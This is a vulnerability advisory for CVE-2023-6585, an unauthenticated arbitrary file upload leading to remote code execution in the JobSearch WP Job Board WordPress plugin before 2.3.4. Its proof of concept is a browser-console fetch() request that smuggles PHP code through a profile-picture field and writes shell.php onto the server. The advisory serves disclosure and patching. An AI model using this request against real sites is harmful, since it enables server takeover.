WordPress Plugin Vulnerabilities

JobSearch WP Job Board < 2.3.4 - Arbitrary File Upload to RCE

Description

The plugin does not validate files to be uploaded, which could allow unauthenticated attackers to upload arbitrary files such as PHP on the server

Proof of Concept

Navigate to the site, and paste the following in your browser's console:

fetch('/wp-admin/admin-ajax.php', {
    method: 'POST',
    headers: {
        'Content-Type': 'application/x-www-form-urlencoded',
    },
    body: new URLSearchParams({
        'action': 'jobsearch_facebook_get_soc_login_url',
        'user_data': JSON.stringify({
            "given_name": (Math.random()*0x1000).toFixed(),
            "family_name": (Math.random()*0x1000).toFixed(),
            "picture": "data:,<?php phpinfo(); //shell.php",
            "name": (Math.random()*0x1000).toFixed(),
            "email": (Math.random()*0x1000).toFixed(),
            "id": (Math.random()*0x1000).toFixed(),
        })
    })
})
.then(response => response.text())
.then(data => console.log(data))
.catch(error => console.error('Error:', error));

Notice a new file named "shell.php" was uploaded to the site.

Affects Plugins

Plugin icon
wp-jobsearch
Fixed in 2.3.4

References

CVE
CVE-2023-6585

Miscellaneous

Original Researcher
Furkan Gedik
Submitter
Furkan Gedik
Submitter website
https://www.linkedin.com/in/furkan-gedik-b99433108/
Verified
Yes
WPVDB ID
757412f4-e4f8-4007-8e3b-639a72b33180

Timeline

Publicly Published
2023-11-24 (about 5 months ago)
Added
2024-02-02 (about 3 months ago)
Last Updated
2024-02-02 (about 3 months ago)

Other

Published
Title
Published
2022-02-23
Title
Amelia < 1.0.46 - Manager+ RCE
Published
2019-05-07
Title
WP Live Chat Support Pro - File Upload Bypass
Published
2014-08-01
Title
WordPress SB Uploader 3.9 - Arbitrary File Upload
Published
2021-04-30
Title
Download Manager < 3.1.19 - Authenticated (author+) PHP4 File Upload to RCE
Published
2014-08-01
Title
Saico - Arbitrary File Upload